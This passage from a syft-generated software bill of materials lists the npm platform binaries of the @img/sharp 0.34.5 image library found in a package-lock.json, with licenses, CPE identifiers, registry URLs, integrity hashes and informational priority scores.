name: '@img/sharp-linux-ppc64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-ppc64:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-ppc64:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_ppc64:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_ppc64:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-linux-ppc64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-linux-ppc64/-/sharp-linux-ppc64-0.34.5.tgz
|
|
integrity: sha512-7zznwNaqW6YtsfrGGDA6BRkISKAAE1Jo0QdpNYXNMHu2+0dTrPflTLNkpc8l7MUP5M16ZJcUvysVWWrMefZquA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7bce516733b8ed22
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-linux-riscv64 0.34.5'
|
|
title: '@img/sharp-linux-riscv64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-linux-riscv64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 523b83e120964834
|
|
name: '@img/sharp-linux-riscv64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-riscv64:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-riscv64:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_riscv64:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_riscv64:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-linux-riscv64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-linux-riscv64/-/sharp-linux-riscv64-0.34.5.tgz
|
|
integrity: sha512-51gJuLPTKa7piYPaVs8GmByo7/U7/7TZOq+cnXJIHZKavIRHAP77e3N2HEl3dgiqdD/w0yUfiJnII77PuDDFdw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 95b5e1930a0a90db
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-linux-s390x 0.34.5'
|
|
title: '@img/sharp-linux-s390x 0.34.5'
|
|
description: 'Package discovered: @img/sharp-linux-s390x 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: cdcec5be4d61926b
|
|
name: '@img/sharp-linux-s390x'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-s390x:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-s390x:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_s390x:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_s390x:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-linux-s390x@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-linux-s390x/-/sharp-linux-s390x-0.34.5.tgz
|
|
integrity: sha512-nQtCk0PdKfho3eC5MrbQoigJ2gd1CgddUMkabUj+rBevs8tZ2cULOx46E7oyX+04WGfABgIwmMC0VqieTiR4jg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ba4a76a3169a3261
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-linux-x64 0.34.5'
|
|
title: '@img/sharp-linux-x64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-linux-x64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8ea3a106d5c8d10b
|
|
name: '@img/sharp-linux-x64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-x64:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-x64:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_x64:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_x64:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-linux-x64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-linux-x64/-/sharp-linux-x64-0.34.5.tgz
|
|
integrity: sha512-MEzd8HPKxVxVenwAa+JRPwEC7QFjoPWuS5NZnBt6B3pu7EG2Ge0id1oLHZpPJdn3OQK+BQDiw9zStiHBTJQQQQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 357195decb462ec7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-linuxmusl-arm64 0.34.5'
|
|
title: '@img/sharp-linuxmusl-arm64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-linuxmusl-arm64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c5d74af075cbec8c
|
|
name: '@img/sharp-linuxmusl-arm64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-arm64:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-arm64:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_arm64:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_arm64:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-linuxmusl-arm64/-/sharp-linuxmusl-arm64-0.34.5.tgz
|
|
integrity: sha512-fprJR6GtRsMt6Kyfq44IsChVZeGN97gTD331weR1ex1c1rypDEABN6Tm2xa1wE6lYb5DdEnk03NZPqA7Id21yg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5332b892777fe61c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-linuxmusl-x64 0.34.5'
|
|
title: '@img/sharp-linuxmusl-x64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-linuxmusl-x64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 26c07c454ffe91ee
|
|
name: '@img/sharp-linuxmusl-x64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-x64:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-x64:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_x64:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_x64:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-linuxmusl-x64/-/sharp-linuxmusl-x64-0.34.5.tgz
|
|
integrity: sha512-Jg8wNT1MUzIvhBFxViqrEhWDGzqymo3sV7z7ZsaWbZNDLXRJZoRGrjulp60YYtV4wfY8VIKcWidjojlLcWrd8Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 34c9f7634c9fe393
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-wasm32 0.34.5'
|
|
title: '@img/sharp-wasm32 0.34.5'
|
|
description: 'Package discovered: @img/sharp-wasm32 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ef4974ec29f2dcac
|
|
name: '@img/sharp-wasm32'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0 AND LGPL-3.0-or-later AND MIT
|
|
spdxExpression: Apache-2.0 AND LGPL-3.0-or-later AND MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-wasm32:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-wasm32:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_wasm32:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_wasm32:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-wasm32@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-wasm32/-/sharp-wasm32-0.34.5.tgz
|
|
integrity: sha512-OdWTEiVkY2PHwqkbBI8frFxQQFekHaSSkUIJkwzclWZe64O1X4UlUjqqqLaPbUpMOQk6FBu/HtlGXNblIs0huw==
|
|
dependencies:
|
|
'@emnapi/runtime': ^1.7.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 866d76b99aec49d7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-win32-arm64 0.34.5'
|
|
title: '@img/sharp-win32-arm64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-win32-arm64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b108eb8ed0a59806
|
|
name: '@img/sharp-win32-arm64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0 AND LGPL-3.0-or-later
|
|
spdxExpression: Apache-2.0 AND LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32-arm64:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32-arm64:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32_arm64:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32_arm64:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-win32-arm64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-win32-arm64/-/sharp-win32-arm64-0.34.5.tgz
|
|
integrity: sha512-WQ3AgWCWYSb2yt+IG8mnC6Jdk9Whs7O0gxphblsLvdhSpSTtmu69ZG1Gkb6NuvxsNACwiPV6cNSZNzt0KPsw7g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 574980068e294acc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-win32-ia32 0.34.5'
|
|
title: '@img/sharp-win32-ia32 0.34.5'
|
|
description: 'Package discovered: @img/sharp-win32-ia32 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8da96e6bc654731f
|
|
name: '@img/sharp-win32-ia32'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0 AND LGPL-3.0-or-later
|
|
spdxExpression: Apache-2.0 AND LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
